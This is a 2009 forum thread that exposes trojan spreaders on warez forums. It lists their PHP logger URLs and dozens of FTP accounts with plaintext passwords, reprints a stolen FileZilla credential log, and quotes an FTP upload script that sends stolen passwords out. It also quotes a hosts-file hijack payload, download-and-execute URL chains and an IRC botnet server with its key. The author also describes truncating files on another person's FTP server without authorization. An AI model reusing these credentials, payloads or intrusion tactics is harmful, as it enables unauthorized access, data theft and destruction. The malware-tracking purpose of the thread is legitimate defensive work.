Source forums: http://warezvb.org users: bagfull00 , liquid and Moby Master , and http://warezscene.org , user: Moby Master ( Googletoolbar.exe - D:\WS\S1\ProjectCC.vbp) , only1_PO ( directx.exe - C:\VB\vgEFunTDA.vbp ) , WaspCro ( firefox3.exe - F:\Project1\1\New Folder\Project1.pdb ).
- http://testing-yeah.us/www/db001/index.php
Source forum: http://warezscene.org user: suspy
- http://91.214.44.123/~rapidrel/index.php
Source forum: warezscene.org user: bigLC316 ( NeroStartSmart.exe ).
- http://www.xtremewarez.us/yash/index.php
Source forums: http://warezvb.org user: son316 and http://warezscene.org user: kiioong
- http://rapidsharze.com/work/index.php
Source forum: http://h4ck-y0u.org user: johnjohnjosh
- http://rmws.blackapplehost.com/index.php
Source forum: http://warezscene.org user: Poldek ( D:\WS2\S1\ProjectCC.vbp )
- http://gullygod.hostoi.com/index.php
Source forum: http://warezscene.org users: DOGS OF DOGS!!! and ziggiman
- http://jailbroken.hostoi.com/index.php
Source forum: http://warezscene.org user: DOGS OF DOGS!!!
- http://www.abousakr.hostoi.com/index.php
Source forum: http://warezscene.org user: Holocost
- http://kwasi.hostoi.com/index.php
Source forum: http://warezscene.org user: mafia03
- http://www.wardomania.com/1stupload.php
http://www.wardomania.com/status.php?username= &computername= Source forum: http://warezscene.org user: fredrickkk
- http://www.ashiyane.org/forums , POST data: id=%[username]%[computername]_%[rnd]&build_id=%[rnd]
Source forum: http://warezscene.org user: hack4 This trojan uses a modified forum script to send all passwords. Normal users will see the forum.
- http://www.ashiyane.org
http://www.akshayw.justfree.com/index.php?action=add&a=&c=&u=&l=&p= Source forum: http://warezscene.org user: Jacone ( E:\Visual Basic Tools\XP PHPCrazyStealer\NotreServ\Project1.vbp )
- http://xhacker.download-area51.com/nmail.php , POST data: txtTo=&txtSubject=Passwords%20of%3A%20%[computername]&txtMessage= %[passwords]
Source forum: http://warezscene.org user: Pirated
- http://superarthome.com/senm.php?data=
http://robert-art.com/senm.php?data= http://myart-gallery.com/senm.php?data= Source forum: http://warezscene.org user: do_nu3dbl
- http://gimwd.oxyhost.com/index.php
Source forum: http://warezscene.org user: Jacone
- http://www.suspy.oxyhost.com
Source forum: http://warezscene.org user: suspy
- http://tps-soniq.com/up.php
Source forum: http://warezscene.org user: k1jhb34l2 ( C:\Dokumente und Einstellungen\Administrator\Desktop\#CODING#\update Msteam\Msteam\DATA!\Project1.vbp )
- http://www.abousakr.netne.net
Source forum: http://warezscene.org user: mohamed911
- http://kalami.kijod.info/index.php
Source forum: http://warezscene.org user: the.crow33
- http://tomiliko.blink.pl/index.php
Source forum: http://warezscene.org users: barthmistrz and bartilios
- http://th3flash.blackapplehost.com/index.php
Source forum: http://warezscene.org user: DIZZAY
- http://gimwd.oxyhost.com/index.php
Source forum: http://warezscene.org user: vagabond2411
- http://mymusik.ilive.ro/submit.php
Source forum: http://warezscene.org user: hawahusna77 This trojan is extracted by a NSIS installer as Server.exe , which makes a socks5 proxy and reports its address. Local path to socks5 proxy project: J:\Program Files\Microsoft Visual Studio\VB98\Upnp Socks\UpnpServ\serv new\Project1.vbp
- http://zaupdt.com/adminpriv/kdlerin/submit.php
Source forum: http://warezscene.org user: sdgarden20 This trojan is extracted by a NSIS installer as OGATray.exe , which makes a socks5 proxy and reports its address. Local path to socks5 proxy project: J:\Program Files\Microsoft Visual Studio\VB98\Upnp Socks\UpnpServ\serv new\Project1.vbp
- http://u3o8boom.com/sdsd/submit.php
Source forum: http://warezvb.org user: Skypath This trojan is extracted by a NSIS installer as svchost.exe , which makes a socks5 proxy and reports its address. Local path to socks5 proxy project: J:\Program Files\Microsoft Visual Studio\VB98\Upnp Socks\UpnpServ\serv new\Project1.vbp
- http://zaupdt.com/adminpriv/ap
Source forum: http://warezvb.org user: dancerick
- http://kr4x.blackapplehost.com/index.php
Source forum: http://warezscene.org user: kr4x
- http://play14.blackapplehost.com/index.php
Source forum: http://warezscene.org user: yoman492
E-mails and e-mail accounts: BiFrost servers:
Poison Ivy servers:
|
|
Vektor
2009-08-01 02:25:24 |
| Quote | - FTP accounts used by trojans posted on public forums:
- ftp://ftp.drivehq.com user: usechange password: manal20
Source forum: http://warezscene.org , user: hideuser
- ftp://muhaimin11.justfree.com user: muhaimin11 password: justvip
Source forum: http://warezscene.org , user: muhaimin11
- ftp://ftp.drivehq.com/My Documents user: myers97 password: halloween
Source forum: http://warezscene.org , user: myers97
- ftp://ftp.rapidsharze.com user: rockstar password: ifucktheworld
Source forum: http://warezscene.org , user: shadeslader
- ftp://82.197.131.52 user: tupact_logs password: 9Ge71Nb4by
Source forum: http://warezscene.org , user: sigma6
- ftp://ftp.drivehq.com user: aidenunder password: 00757757
Source forum: http://warezscene.org , user: xxxsnoopyxxx
- ftp://ftp.drivehq.com user: randyrkofu password: bhenchod
Source forum: http://warezscene.org , user: dxwasim
- ftp://ftp.drivehq.com user: tanpa.kekasih password: ongkek
Source forum: http://warezscene.org , user: Bill610051
- ftp://93.174.93.130 user: fusionpa password: uy32O33o7a
Source forum: http://warez-bb.org , user: jaymm422 He is the owner of fusionpassez.com , this is the FTP account for his forum (found in an .exe file infected with iStealer). This trojan spreader has the habit most trojan spreaders have, to upload the log file with own passwords on all FTP's used by trojans posted by them on public forums.
| ftp.fussionpasses.com-ftp_log wrote: | Tue Jul 28 03:06:32 2009 0 124.190.93.163 7762 /home/fusionpa/DESKTOP_270709_1555.html a _ o r fusionpa ftp 1 * c Tue Jul 28 03:06:32 2009 0 124.190.93.163 353 /home/fusionpa/AD-DE7FCA454048_280709_0821.html a _ o r fusionpa ftp 1 * c Tue Jul 28 03:06:33 2009 0 124.190.93.163 3565 /home/fusionpa/LASTXP_280709_0019.html a _ o r fusionpa ftp 1 * c Tue Jul 28 03:06:33 2009 0 124.190.93.163 358 /home/fusionpa/LIFEBOOK-3BA884_270709_2226.html a _ o r fusionpa ftp 1 * c Tue Jul 28 03:06:34 2009 0 124.190.93.163 485 /home/fusionpa/MAIN_270709_1608.html a _ o r fusionpa ftp 1 * c Tue Jul 28 03:06:34 2009 0 124.190.93.163 1659 /home/fusionpa/MYM-TROTTERS_270709_1430.html a _ o r fusionpa ftp 1 * c Tue Jul 28 03:06:35 2009 0 124.190.93.163 426 /home/fusionpa/STARGATE_270709_2348.html a _ o r fusionpa ftp 1 * c Tue Jul 28 03:06:35 2009 0 124.190.93.163 477 /home/fusionpa/USER_270709_2234.html a _ o r fusionpa ftp 1 * c Tue Jul 28 03:17:45 2009 0 76.204.151.233 17324 /home/fusionpa/public_html/archive/index.php a _ o r jaycrilla@fusionpassez.com ftp 1 * c Tue Jul 28 03:22:48 2009 0 76.204.151.233 16724 /home/fusionpa/public_html/includes/functions_digest.php a _ o r jaycrilla@fusionpassez.com ftp 1 * c Tue Jul 28 03:23:07 2009 0 76.204.151.233 13882 /home/fusionpa/public_html/includes/functions_forumdisplay.php a _ o r jaycrilla@fusionpassez.com ftp 1 * c Tue Jul 28 03:23:20 2009 0 76.204.151.233 55722 /home/fusionpa/public_html/includes/functions_newpost.php a _ o r jaycrilla@fusionpassez.com ftp 1 * c Tue Jul 28 03:23:59 2009 0 76.204.151.233 55062 /home/fusionpa/public_html/clientscript/vbulletin_textedit.js a _ o r jaycrilla@fusionpassez.com ftp 1 * c Tue Jul 28 03:34:28 2009 0 76.204.151.233 456 /home/fusionpa/public_html/clientscript/yui/dev-readme.txt a _ o r jaycrilla@fusionpassez.com ftp 1 * c Tue Jul 28 04:07:41 2009 1 94.23.114.104 11115 /home/fusionpa/public_html/includes/visionscripts/psionic_hide/global_start.php a _ i r fusionpa ftp 1 * c |
|
Of course, "jay crilla" tested iStealers on himself and uploaded his log to all his FTP accounts,
| JAYCRILL_B05AD8_.txt wrote: | ============================ File Zilla ============================ ------------------------- Host:jaymm422.free-site-host.com Username:jaymm422 Password:worthless ------------------------- Host:freegameproject.at.ua Username:2freegameproject Password:postal2 ------------------------- Host:worthless.freewebhostx.com Username:worthless Password:worthless422 ------------------------- Host:jaymm422.blackapplehost.com Username:jaymm422 Password:dank8091 ------------------------- Host:jaymm422.netau.net Username:a6738323 Password:worthless1 ------------------------- |
|
All these accounts are currently used by iStealer trojans (FTP version and PHP Logger version).
- ftp://193.92.33.194/httpdocs/logs/ user: rokasftp password: Lsn7U%Tg#E
Source forum: http://warez-bb.org , user: heavenly war
- ftp://ftp.testme.ezeserv.com user: vox@testme.ezeserv.com password: vox
Source forum: http://warez-bb.org , user: tAAlz
- ftp://ftp.wsuploads.info user: Hacker@wsuploads.info password: uevbs73
ftp://ftp.wsbomb.nxserve.net user: logs@wsbomb.nxserve.net password: shammi Source forum: http://warezforum.info , user: jack* Files are binded with 2 trojans, each trojan with its FTP account.
- ftp://ftp.deaglegames.com user: caneone password: Alex4868
Source forum: http://warezforum.info , user: lildegregs22 Another trojan spreader using the FTP for his websites in iStealer trojans. Google says that his website can "harm your computer". Well... what was on his FTP could had caused harm to your eyes. BTW his Poison Ivy server: caneone1.no-ip.biz:15963 .
- ftp://ftp.drivehq.com user: SudaniZ password: hacker4ever
Source forum: http://warezforum.info , user: RainBow96
- ftp://ftp.drivehq.com user: philk3393 password: motorola99
Source forum: http://warez-bb.org , user: aldelorien
- ftp://Files9.cyberlynk.net user: viclogs password: viclogs
Source forum: http://warez-bb.org , user: dr.indian Another dotCrap extractor of Nirsoft "tools" which, of course, crashes on most systems before sending anything to FTP (compiled: C:\Programme\Microsoft Visual Studio\VB98\sample\Buts LiteStealer v.1\Projekt1.vbp ). But that's not a problem, the trojan spreader also binded an iStealer that uses same account.
| XLWAO.exe wrote: | Scene-CoderZ LS c0ded by w0red! [Daten] 1-:-Files9.cyberlynk.net-:-viclogs-:-viclogs-:--:- 1-:-1-:-1-:-1-:-1-:-1-:-1-:-1-:-1-:-1-:-1-:-0-:- 0-:-Error 42342-:-An Error occured. The program must be closed!-:-Normal-:-0-:-0-:-g34tg3gerrgfbv-:--:-1-:- 0-:-0-:-0-:-0-:-1-:-1-:- 0-:-0-:-minut-:- 0-:-dltxt-:-1-:- [Daten] |
|
- ftp://ftp.drivehq.com/My Music user: ghyll password: lancej
Source forum: http://warez-bb.org , user: LostArch Some plain text from stealer's .exe file (which is another dotCrap extractor of Nirsoft tools): | Temp\2.exe wrote: | | @@NN@@ftp.drivehq.com@@NN@@ghyll@@NN@@lancej@@NN@@10@@NN@@My Music@@NN@@true@@NN@@false|@@NN@@false@@NN@@active |
|
- ftp://ftp.desirockerz.info user: hhstealer@desirockerz.info password: james007bond
Source forum: http://warez-bb.org , user: guzar
- ftp://haz-one.justfree.com user: haz-one password: 0139940751
Source forum: http://warez-bb.org , user: haz-one
- ftp://patta.justfree.com user: patta password: patta
Source forum: http://warez-bb.org , user: lummy
- ftp://ftp.drivehq.com user: satjoy password: sat456321
Source forum: http://warez-bb.org , user: Mr.mohamed
- ftp://ftp.drivehq.com user: mudassar0529 password: sadafvuskp
Source forum: http://warez-bb.org , user: purpule lover
- ftp://ftp.conanthum.info user: cyber95@inter-defi.com password: 666666
Source forum: http://warez-bb.org , user: sate.padang
- ftp://brijendrasial.freehostia.com user: brisia7 password: lucky2
Source forum: http://warez-bb.org , user: sialbrijendra (compiled: C:\Documents and Settings\iZac\Desktop\AuraStomper\Reveal\Project1.vbp)
- ftp://ftp.drivehq.com user: trythisone password: nukeblast
Source forum: http://warez-bb.org , user: a7081a
- ftp://mina.hostei.com user: a3982170 password: B7ZJwWN558
Source forum: http://warez-bb.org , user: aadukiki
- ftp://ftp.rapidshare.co.cc user: rapidcc password: 0100209631lmao
Source forum: http://warez-bb.org , user: Gilon
- ftp://ftp.drivehq.com user: mriran password: ftp123456789
Source forum: http://warez-bb.org , user: loglives
- ftp://testing.bplaced.net user: testing password: testing
Source forum: http://warez-bb.org , user: owleye
- ftp://games2.nsw.ausnetservers.com.au/home/scrimzon user: scrimzon password: #Ql29CYK1;CX
Source forum: http://warez-bb.org , user: SlixX123698741
- ftp://bz-web.de user: web4f1 password: zNc0Xgss
Source forum: http://warez-bb.org , user: vossyger Local path to trojan spreader's "project": C:\Programme\Microsoft Visual Studio\VB98\steam.vbp . You must have Steam installed or else it crashes.
- ftp://ftp.drivehq.com user: sparkliquid password: 890908
Source forum: http://warez-bb.org , user: sparkliquid Ardamax keylogger.
- ftp://ftp.drivehq.com user: whatishappening password: whatishappening
Source forum: http://warezscene.org , user: The uploader Ardamax keylogger.
- ftp://madafaka.0catch.com user: madafaka.0catch.com password: samsung
Source forum: http://warezscene.org , users: Pirated and sandiyo This trojan extracts 2 files, M5NH4CK3R.EXE (Ardamax keylogger) and MSNSPY.exe (AutoIT program).
| Code: | While 1 $msg = GUIGetMsg() Select case $msg = $GUI_EVENT_CLOSE ExitLoop case $msg = $buttonstart GUICtrlSetData ($progbar, 1) GUICtrlCreateLabel("Initialisiere...", 120, 50) Sleep(1000) GUICtrlSetData ($progbar, 10) Sleep(1000) GUICtrlSetData ($progbar, 15) GUICtrlCreateLabel("Verbinde mit Server...", 120, 65) Sleep(2500) GUICtrlSetData ($progbar, 20) Sleep(1000) GUICtrlSetData ($progbar, 40) GUICtrlCreateLabel("Daten werden uebertragen...", 120, 80) Sleep(1000) GUICtrlSetData ($progbar, 45) Sleep(1000) GUICtrlSetData ($progbar, 56) Sleep(1000) GUICtrlSetData ($progbar, 60) Sleep(1000) GUICtrlSetData ($progbar, 65) GUICtrlCreateLabel("Verbinde zu Chatpartner...", 120, 95) sleep(1000) GUICtrlSetData ($progbar, 70) Sleep(1000) GUICtrlSetData ($progbar, 75) Sleep(1000) GUICtrlSetData ($progbar, 75) Sleep(1000) GUICtrlSetData ($progbar, 75) GUICtrlCreateLabel("!!unknown error!!", 120, 110) sleep(1000) GUICtrlSetData ($progbar, 65) sleep(1000) GUICtrlSetData ($progbar, 50) sleep(1000) GUICtrlSetData ($progbar, 10) sleep(1000) GUICtrlSetData ($progbar, 0) GUICtrlCreateLabel(" Please report to support@msnspy.biz", 110, 125) sleep(1000) case $msg = $buttonstop EndSelect Wend |
|
- ftp://ftp.t35.com user: jesuschristinmyass.t35.com password: voide123
Source forum: http://warez-bb.org , user: burNzw
- ftp://applications.justfree.com user: applications password: 24091992
Source forum: http://warez-bb.org , user: Mposter
- ftp://gamergalaxy2.blackapplehost.com user: gamergalaxy2 password: 321098
Source forum: http://warez-bb.org , user: SimeCro
- ftp://bbwarez.servegame.org user: bbwarez password: admin
Source forum: http://warez-bb.org , user: tomahawk_1987
- ftp://76.73.37.130 user: sayem password: 123456
Source forum: http://warez-bb.org , user: ViRtUaloRd HacKeR (without_clone.exe)
- ftp://belmacha.justfree.com user: belmacha password: belma123
Source forum: http://warez-bb.org , user: xillion
- PHP loggers:
- http://faithislove.justfree.com/index.php
Source forum: http://warezscene.org , user: adl0816
- http://msshfh.blackapplehost.com/index.php
Source forum: http://warezscene.org , user: misterx.therock
- http://myers.blackapplehost.com/index.php
Source forum: http://warezscene.org , user: myers97
- http://www.revolthost.com/index.php
Source forum: http://warezscene.org , user: rec alpam
- http://testing-yeah.us/www/db002/index.php
Source forum: http://warezscene.org , user: shadeslader
- http://hhdatabase.webcindario.com/index.php
Backdoor from public versions of iStealer5 (compiled: I:\HID1\HID1\Sourcecode iStealer 5.0 HID\Sourcecode iStealer 5.0 HID\Editor - Builder\iStealer.vbp ) and iStealer4 (compiled: C:\Documents and Settings\Kizar\My Documents\Hacking\iStealer 4.0\iStealer Editor\iStealer.vbp ).
- http://warezbb.info/Dont_Bother/index.php
Source forum: http://warez-bb.org , user: tAAlz (iexplorer.exe , "Uploaded.by.Moby.Master.txt" - see the post above)
- http://testing-yeah.us/www/db005/index.php
Source forum: http://warez-bb.org , user: ackan87
- http://www.adennia.ueuo.com/index.php
Source forum: http://warez-bb.org , user: dzoki93
- http://sniperws.com/phplogger/index.php
Source forum: http://warez-bb.org , user: ajsun (WINRAR~2.EXE , compiled: D:\WS\S4\ProjectCC.vbp )
- http://megauplaod.info/rapid/index.php
Source forum: http://warez-bb.org , user: devilboy23 (explorer.exe , compiled: D:\Opt\S3\ProjectSBC.vbp )
- http://rizwanisbest.6te.net/index.php
Source forum: http://warez-bb.org , user: Gold012 (Crypted Hell.exe , compiled: D:\SCrypt\S1\Project1.vbp )
- http://rizwanloveslife.info/index.php
Source forum: http://warez-bb.org , user: martins86 (WGA_v1.7.69.2_crack.exe , compiled: D:\WS\S1\ProjectCC.vbp )
- http://hotsexinsports.com/ppi2/submit.php
Source forum: http://warez-bb.org , user: Gilon
- http://ecofriendlydoghouses.net/data3/index.php
Source forum: http://warez-bb.org , users: jomasaco , sensan , Kangaroo666
- http://vb.9inty9.com/index.php
Source forum: http://warez-bb.org , user: sandi421
- http://www.xtremewarez.us/Fl2m3/index.php
Source forum: http://warez-bb.org , user: waneros86
- http://sabir.justfree.com/index.php
Source forum: http://warez-bb.org , users: lelothebest , ViRtUaloRd HacKeR
- http://ankithmt.123bemyhost.com/index.php
Source forum: http://warez-bb.org , user: master7568
- http://kr4x.blackapplehost.com/index.php
Source forum: http://warez-bb.org , user: N1T
- http://endhiran.justfree.com/index.php
Source forum: http://warez-bb.org , user: sagarqwerty (files1.exe , compiled: D:\JQuery\Project1.vbp ) "http://endhiran.justfree.com/index.php|Title|Error Text|0|16|0|"
- http://www.uday4u.info/uday/index.php
Source forum: http://warez-bb.org , user: Thewarezgod "http://www.uday4u.info/uday/index.php|Error|An unexpected error occured|0|16|0|0|00|1|C:\Documents"
- http://rapidsharze.com/work/index.php
Source forum: http://warez-bb.org , user: vimmy2492
- E-mail accounts:
- Other trojans:
- FaceBook Freezer.exe
Source forum: http://warez-bb.org , user: m0n WinRAR SFX which overwrites %systemroot%\drivers\etc\hosts with this file:
| Code: | # HACK3R
127.0.0.1 localhost
127.0.0.1 www.facebook.com 127.0.0.1 facebook.com
127.0.0.1 www.aol.com 127.0.0.1 aol.com
127.0.0.1 www.hotmail.com 127.0.0.1 hotmail.com
127.0.0.1 www.yahoo.com 127.0.0.1 yahoo.com
127.0.0.1 www.gmail.com 127.0.0.1 gmail.com
127.0.0.1 login.live.com 127.0.0.1 mail.live.com 127.0.0.1 login.yahoo.com
127.0.0.1 www.rapidshare.com 127.0.0.1 rapidshare.com
127.0.0.1 www.cyberserg.com 127.0.0.1 cyberserg.com
127.0.0.1 www.albwzone.com 127.0.0.1 albwzone.com |
|
| Code: | ;The comment below contains SFX script commands
Path=C:\windows\system32\drivers\etc\ SavePath Silent=1 Overwrite=1 |
|
- file.exe
Source forum: http://warez-bb.org , user: r0r This trojan downloads and executes anything that can be found at any of these addresses: http://82.98.235.70/443 , http://65.243.103.80/80
- SSM.exe (compiled: C:\Users\Bodeezy\Desktop\IMPROTOOLS\SSM UPDATE\SSM\SSM\obj\Release\SSM.pdb )
Source forum: http://warez-bb.org , user: billuk3 I posted before about this trojan, it is an encrypted dotCRAP program which calls PPC links (link list source: http://www.itsrunbytools.com/s/WE/0035/info.php), and it has a GUI which normally is not shown. However, there are ways to make it visible. Screenshot:

- svhost.exe , lsaas.exe
Source forums: http://warezforum.info, http://wrzboard.org user: talkativr4 , http://warezvb.org , user: dancerick This trojan is usually extracted and executed by a NSIS installer, and it is a NSIS installer itself which executes "net stop WSCSVC" then downloads and executes a file from http://zaupdt.com/adminpriv/ap . http://zaupdt.com/adminpriv/ap redirects to http://tinyurl.com/kjbqgd/ , which redirects to http://hosting-for-free.info/uploads/1247667284.exe (VirusTotal) (for more samples, reports with earnings, logs, screenshots, etc. visit the rapidtrojan website)
1247667284.exe is a dropper for cfmon.exe (rootkit) and service.exe (downloader)
Service.exe has these hardcoded download links and paths (it will download, save and execute everything): - http://chifcwbifg.com/progs/wirfjaosw/eocptxyc.php?adv=adv797 (195.2.253.241 at the time I checked it)
- http://dhfpvnxgfw.net/progs/wirfjaosw/eocptxyc.php?adv=adv797 (195.2.253.243 at the time I checked it)
- http://chifcwbifg.com/progs/wirfjaosw/xhuyph.php
http://dhfpvnxgfw.net/progs/wirfjaosw/xhuyph.php c:\pnhipken.exe (705 bytes, executable file compressed with FSG that does nothing more than call ExitProcess) - http://chifcwbifg.com/progs/wirfjaosw/ekkofxb.php
http://dhfpvnxgfw.net/progs/wirfjaosw/ekkofxb.php c:\gjdnse.exe (705 bytes, executable file compressed with FSG that does nothing more than call ExitProcess) - http://chifcwbifg.com/progs/wirfjaosw/slvanev.php
http://dhfpvnxgfw.net/progs/wirfjaosw/slvanev.php c:\khquid.exe (705 bytes, executable file compressed with FSG that does nothing more than call ExitProcess) - http://chifcwbifg.com/progs/wirfjaosw/zwjbfj.php
http://dhfpvnxgfw.net/progs/wirfjaosw/zwjbfj.php c:\fhntweri.exe (dropper for bcfaadfdadacf.dll, which creates a remote thread in Winlogon.exe that gets a list with instructions from wl.genseck.com) - http://chifcwbifg.com/progs/wirfjaosw/udvvmquz.php
http://dhfpvnxgfw.net/progs/wirfjaosw/udvvmquz.php c:\rlmnkvyl.exe (rootkit installer for aec.sys) - http://chifcwbifg.com/progs/wirfjaosw/isgtklct.php
http://dhfpvnxgfw.net/progs/wirfjaosw/isgtklct.php c:\vfjmbvbg.exe (705 bytes, executable file compressed with FSG that does nothing more than call ExitProcess) - http://chifcwbifg.com/progs/wirfjaosw/nxkoyp
http://dhfpvnxgfw.net/progs/wirfjaosw/nxkoyp - http://dhfpvnxgfw.net/progs/wirfjaosw/
http://chifcwbifg.com/progs/wirfjaosw/ - http://chifcwbifg.com/progs/wirfjaosw/isgtklct.php
- http://chifcwbifg.com/progs/wirfjaosw/nxkoyp
- http://chifcwbifg.com/progs/wirfjaosw/xhuyph.php
- http://chifcwbifg.com/progs/wirfjaosw/ekkofxb.php
- http://chifcwbifg.com/progs/wirfjaosw/slvanev.php
- http://chifcwbifg.com/progs/wirfjaosw/zwjbfj.php
- http://chifcwbifg.com/progs/wirfjaosw/udvvmquz.php
- http://chifcwbifg.com/progs/wirfjaosw/isgtklct.php
- http://chifcwbifg.com/progs/wirfjaosw/eocptxyc.php?adv=adv797
Received configuration file from wl.genseck.com (206.161.205.220):
| Code: | r_startup_delay=400 config_update_period=84600 config_url_0=http://wl.genseck.com/v306/logo.jpg config_url_1=http://wl.igoesto.com/v306/logo.jpg config_url_2=http://wl.remiusa.com/v306/logo.jpg config_url_3=http://209.9.171.251:43543/wl/v306/logo.jpg config_url_count=4 config_url_tries_0=6 config_url_tries_1=4 config_url_tries_2=2 config_url_tries_3=1 config_version=1 create_time=2009-07-15 18:27:36:062 id=5bc0f6a95ad5361fd397a445d2a68cf4 last_config_update=1247672057 wmid=cl991 |
|
The file logo.jpg is a base64 encoded encrypted configuration file (encrypted then encoded to base64).
http://chifcwbifg.com/progs/wirfjaosw/nxkoyp - dropper trojan, which downloads and executes files from these addresses: - http://chifcwbifg.com/uniq.php?id=1759469761&p=0
text: ok - http://dhfpvnxgfw.net/aasuper0.php
c:\imkmpuqp.exe (705 bytes, executable file compressed with FSG that does nothing more than call ExitProcess) - http://dhfpvnxgfw.net/aasuper1.php
c:\tjwupb.exe - http://dhfpvnxgfw.net/aasuper2.php
c:\blxwl.exe - WinRAR SFX, extracts and executes install.exe, which is a rootkit installer (glaide32.sys). - http://dhfpvnxgfw.net/aasuper3.php
c:\poqj.exe - downloads an encrypted configuration file from http://iframr.com/plist.php?uid=a5c7124324cf02c4e03542310d0b3881 and 2 .exe's from http://download.microsoft-update-center.com:88/files/db.exe (compiled: D:\Documents and Settings\Administrator\Lb\dailybucks}\mycc\Project1.vbp) and http://installmoney.com/svchost.exe (cabinet SFX which extracts mshost.exe and mshost1.exe).
More trojans are downloaded, like installscash.exe , luxecash.exe , dailybucks.exe , socks.exe , ppcmania.exe , bot.exe , calc.exe , ebatoria.exe , 242.exe , install_fafbf.exe etc. Yep, looks like a successor of "XP Antivirus" trojan.
- vsutil.exe
Source forum: http://warez-bb.org , users: famafair1 , stoptillu69 A NSIS installer like the above, but the download address is different, this one downloads from http://zaupdt.com/adminpriv/ap http://zaupdate.com/security/en-us/vsmon -> http://tinyurl.com/nhdad9 -> http://anonymouse.org/cgi-bin/anon-www.cgi/http://tinyurl.com/m97nae/ -> http://anonymouse.org/cgi-bin/anon-www.cgi/http://z1.przeklej.pl/przo1740/0db7c2c5002285d84a7226f3/belgium8320.jpg (a renamed .exe)
- mscoef.exe (compiled: D:\no-ip\nepal1.hopto.org\ri0t[v5] with rar,udp,ssyn\ri0t[v5] with rar,udp,ssyn\Debug\ri0t.pdb )
Source forum: http://warezscene.org , user: hellomoto1234 IRC botnet server: nepal.no-ip.biz (chat.smokeynet.org), channel #platform , key: t3sting , prefix for bots: [s0ft]*
|
|
Vektor
2009-09-12 17:02:44 |
| Quote | - FTP accounts:
- ftp://azam90.blackapplehost.com user: azam90 password: 123456
Source forum: http://warez-bb.org user: DakBaik
- ftp://indiantricks.110mb.com user: indiantricks password: computer
Source forum: http://warez-bb.org user: derma
- ftp://ftp.drivehq.com user: maradoPT password: candeias2009
Source forum: http://warez-bb.org user: dodo_andrea
- ftp://ftp.the-darkworld.org user: aol@the-darkworld.org password: aol
Source forum: http://warez-bb.org user: mrsandvik
- ftp://ftp.drivehq.com user: violent password: aforapplebforball
Source forum: http://warez-bb.org user: secondnumber
- ftp://ftp.drivehq.com user: bluejays77 password: arushan77
Source forum: http://warez-bb.org user: Sujen12
- ftp://ftp.t35.com user: k11ng.t35.com password: 000000
Source forum: http://warez-bb.org user: warez_ki1ng
- ftp://server21.blackapplehost.com/1!2@3#/ user: server21 password: 9(8*7&;
Source forum: http://warez-bb.org user: _L_ Some plain text from trojan's .exe file (ITCJFA~1.exe): | Code: | | SO!#USERserver21EO!#USERSO!#HOSTserver21.blackapplehost.comEO!#HOSTSO!#PASS9(8*7&;EO!#PASSSO!#DIR/1!2@3#/EO!#DIR |
|
- ftp://worthless.freewebhostx.com user: worthless password: worthless422
Source forum: http://warez-bb.org user: jaymm422
- ftp://ftp.t35.com user: dta_pranav.t35.com password: bottle098
Source forum: http://katzforums.com user: AABA000
- ftp://ftp.arafman.info user: test@arafman.info password: pamu25$
Source forum: http://katzforums.com user: accaoli The trojan posted by this user (raptori.exe) creates 2 files in %windir% , 1.tmp ("Raptor Password Stealer Log") and 2.tmp (a ftp.exe script file).
| 2.tmp wrote: | open ftp.arafman.info 21 test@arafman.info pamu25$ put "C:\WINDOWS\1.tmp" "/%[windows_user_name]_%[random_15digit_number].txt" quit |
|
- ftp://ftp.drivehq.com user: musicmax password: 136755019
Source forum: http://pakwarez.com user: 123sat
- ftp://ftp.greatsolo.com user: across@greatsolo.com password: lol123
Source forum: http://pakwarez.com user: bigi88
- ftp://ftp.gimyhack.gi.funpic.de user: gimyhack password: pridurak1
Source forum: http://pakwarez.com user: clowngub
- ftp://htp1.blackapplehost.com user: htp1 password: batista
Source forum: http://pakwarez.com user: Cyb1337
- ftp://ftp.t35.com user: noone123.t35.com password: fucku
Source forum: http://pakwarez.com user: mohsan12
- ftp://ftp.blackdigits.co.za user: log@blackdigits.co.za password: d1acr1t1c
Source forum: http://pakwarez.com users: rustam, xxr00txx (local path to trojan "project": C:\Documents and Settings\XeIDy\Desktop\Xtealer [FuDDing][Now 2 Remaining]\Stub\Project1.vbp )
- ftp://brijendrasial.freehostia.com user: brisia7 password: lucky2
Source forum: http://pakwarez.com user: sialbrij
- ftp://ftp.drivehq.com user: pureownage password: super
Source forum: http://pakwarez.com user: TSM
- ftp://fjux1.justfree.com user: fjux1 password: firefox
Source forum: http://pakwarez.com user: Zer(O)
- ftp://ftp.4rms.com user: arms@4rms.com password: masterpass362436
Source forum: http://warez-bb.org user: juzzy16 This user is not spamming forums with executables infected with stealer trojans, the trojan from his .exe's copies itself locally as sdra64.exe in Windows directory (same trojan as sdra64.exe with a ring3 rootkit I found 2 days ago, just the address of config file is different), and it gets an encrypted config file from http://systemupdate.org/zp/config.bin. When I checked it, the config file had a task of downloading and executing http://systemupdate.org/googletoolbar.exe which is a modified HackHound stealer that uses this FTP account.
- ftp://youpremium.sqweebs.com user: youpremium password: 3563316432
Source forum: http://warez-bb.org user: ale_integ
- ftp://thug.425mb.com user: thug password: bhailog
Source forum: http://warez-bb.org user: Declercq
- ftp://76.73.53.6 user: dotingce password: DTra1DMBQ0
Source forum: http://warez-bb.org user: consean (local path to trojan "project": C:\Games\Projects\HH Keylogger\Stealer\Project1.vbp ) I set FTPBot to truncate all files from his "BlackMarket" directory too. | FTPBot wrote: | [ dotingce@76.73.53.6 ] --> LIST [ dotingce@76.73.53.6 ] 150 Accepted data connection drwxr-xr-x 2 dotingce dotingce 4096 Aug 8 08:23 . drwxr-x--- 6 dotingce 99 4096 Aug 7 12:57 .. -rw-r--r-- 1 dotingce dotingce 0 Aug 8 08:22 Offerts.txt -rw-r--r-- 1 dotingce dotingce 0 Aug 8 08:22 [Amazon]SELL.txt -rw-r--r-- 1 dotingce dotingce 0 Aug 8 08:22 [MediaFire]SELL.txt -rw-r--r-- 1 dotingce dotingce 0 Aug 8 08:22 [Porn]SELL.txt -rw-r--r-- 1 dotingce dotingce 0 Aug 8 08:22 [RS]SELL.txt -rw-r--r-- 1 dotingce dotingce 0 Aug 8 08:22 [Skype]SELL.txt -rw-r--r-- 1 dotingce dotingce 0 Aug 8 08:22 [Travian]SELL.txt -rw-r--r-- 1 dotingce dotingce 0 Aug 8 08:22 [Uploading]SELL.txt -rw-r--r-- 1 dotingce dotingce 0 Aug 8 08:22 [cPanel]SELL.txt -rw-r--r-- 1 dotingce dotingce 0 Aug 8 08:23 [eBay]SELL.txt |
|
